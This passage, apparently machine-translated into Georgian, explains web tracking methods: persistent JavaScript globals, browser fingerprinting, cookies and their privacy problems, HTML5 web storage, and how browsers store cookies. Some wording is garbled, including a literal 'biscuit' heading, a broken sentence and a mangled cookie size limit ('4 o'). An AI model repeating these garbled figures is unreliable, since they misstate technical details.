ამ დროს პროგრამა რჩება ქეშ მეხსიერებაში და მონახულებული გვერდი მეორედ არ იტვირთება. შესაბამისად, თუ პროგრამა შეიცავს გლობალურ ცვლადს (მაგალითად, var id = 3243242;), ეს იდენტიფიკატორი რჩება ძალაში და შეიძლება გამოიყენოს სხვა JavaScript კოდით გვერდის ხელახლა ჩატვირთვის ან პროგრამის დამაკავშირებელი გვერდის ჩატვირთვის შემდეგ. 

ამ მეთოდის მთავარი მინუსი ის არის, რომ JavaScript გლობალური ცვლადი უნდა იყოს სტატიკური, რაც იმას ნიშნავს, რომ ის არ შეიძლება შეიცვალოს ან წაიშალოს როგორც ქუქი.

ვებ ბრაუზერის თითის ანაბეჭდი

ბრაუზერის თითის ანაბეჭდი არის ინფორმაცია, რომელიც გროვდება ბრაუზერის კონფიგურაციის პარამეტრების შესახებ იდენტიფიკაციის მიზნით. ამ თითის ანაბეჭდების გამოყენება შესაძლებელია ინტერნეტის მომხმარებლის ან მოწყობილობის სრულად ან ნაწილობრივ იდენტიფიცირებისთვის მაშინაც კი, როდესაც ქუქი-ფაილები გამორთულია.

ძირითადი ვებ ბრაუზერის კონფიგურაციის ინფორმაცია დიდი ხანია გროვდება ვებსაიტების აუდიტორიის სერვისების მიერ, რათა ზუსტად გაზომონ ადამიანების ვებ ტრაფიკი და გამოავლინონ დაწკაპუნების თაღლითობის სხვადასხვა ფორმები. კლიენტის მხრიდან სკრიპტირების ენების დახმარებით ბევრად უფრო ზუსტი ინფორმაციის შეგროვებაა ახლა შესაძლებელია.

ამ ინფორმაციის ბიტის სტრიქონად გადაქცევა აწარმოებს მოწყობილობის თითის ანაბეჭდს. 2010 წელს Electronic Frontier Foundation (EFF) გაზომა ბრაუზერის თითის ანაბეჭდის ენტროპია მინიმუმამდე. 18,1 ბიტი, და ეს იყო მანამ, სანამ ტილოზე თითის ანაბეჭდის მიღწევები ამ ენტროპიას 5,7 ბიტს ამატებდა.

ორცხობილა მოკლედ

ქუქი-ფაილები არის მცირე ზომის ტექსტური ფაილები, რომლებიც ინახება ვებ ბრაუზერის მიერ ვებსაიტის ვიზიტორების მყარ დისკზე და რომლებიც გამოიყენება (სხვა საკითხებთან ერთად) ვიზიტორის შესახებ ინფორმაციის ჩასაწერად ან საიტზე მათი მოგზაურობის შესახებ. ვებმასტერს შეუძლია ამგვარად ამოიცნოს ვიზიტორის ჩვევები და მოახდინოს მისი საიტის პრეზენტაციის პერსონალიზაცია თითოეული ვიზიტორისთვის; ქუქიები შესაძლებელს ხდის დაიმახსოვროთ რამდენი სტატიის ჩვენება მთავარ გვერდზე ან თუნდაც შევინარჩუნოთ შესვლის სერთიფიკატები ნებისმიერი კერძო მხარისთვის: როდესაც სტუმარი ბრუნდება საიტზე, მას აღარ სჭირდება მისი სახელი და პაროლი აკრიფოს. იყოს აღიარებული, რადგან ისინი ავტომატურად იკითხება ქუქიში.

ქუქი-ფაილს აქვს შეზღუდული სიცოცხლის ხანგრძლივობა, რომელიც მითითებულია საიტის დიზაინერის მიერ. მათ ასევე შეუძლიათ იწურონ საიტზე სესიის ბოლოს, რაც შეესაბამება ბრაუზერის დახურვას. ქუქი-ფაილები ფართოდ გამოიყენება ვიზიტორებისთვის ცხოვრების გასაადვილებლად და მათთვის უფრო შესაბამისი ინფორმაციის წარმოსაჩენად. მაგრამ სპეციალური ტექნიკა შესაძლებელს ხდის ვიზიტორს თვალყური ადევნოს რამდენიმე საიტზე და ამით შეაგროვოს და გადაამოწმოს ძალიან ვრცელი ინფორმაცია მის ჩვევებზე. ამ მეთოდმა ქუქიების გამოყენებას მიანიჭა რეპუტაცია, როგორც სათვალთვალო ტექნიკა, რომელიც არღვევს ვიზიტორების კონფიდენციალურობას, რაც, სამწუხაროდ, შეესაბამება რეალობას არატექნიკური მიზეზების გამო გამოყენების ან მომხმარებლის მოლოდინების არაპატივისცემის შემთხვევაში.

ამ ლეგიტიმური შიშების საპასუხოდ, HTML 5 წარუდგენს ახალ JavaScript API-ს კლიენტის მხარეს მონაცემთა შესანახად, სახელწოდებით ვებ საცავი, რომელიც ბევრად უფრო უსაფრთხოა და უფრო დიდი ტევადობით, რომელიც მიზნად ისახავს ქუქიების შეცვლას.

ქუქიების შენახვა

ზოგიერთ ბრაუზერში ქუქი-ფაილი ადვილად რედაქტირებადია, მარტივი ტექსტური რედაქტორი, როგორიცაა Notepad, საკმარისია მისი მნიშვნელობების ხელით შესაცვლელად.

ქუქიების შენახვა ხდება სხვადასხვაგვარად, ბრაუზერის მიხედვით:

• Microsoft Internet Explorer ინახავს თითოეულ ქუქის სხვადასხვა ფაილში;
• Mozilla Firefox ინახავს ყველა ქუქი ფაილს ერთ ფაილში;
• ოპერისა ინახავს ყველა მის ქუქი-ფაილს ერთ ფაილში და შიფრავს მათ (შეუძლებელია მათი შეცვლა პროგრამული უზრუნველყოფის ოფციების გარდა);
• Apple Safari ინახავს ყველა ქუქი ფაილს .plist გაფართოების ფაილში. მოდიფიკაცია შესაძლებელია, მაგრამ არც ისე ადვილია, თუ არ გაივლით პროგრამული უზრუნველყოფის ვარიანტებს.

ბრაუზერები საჭიროა მხარდაჭერა მინიმუმი :

• 300 ერთდროული ქუქი;
• 4 o თითო cookie;
• 20 ქუქი თითო ჰოსტზე ან დომენზე.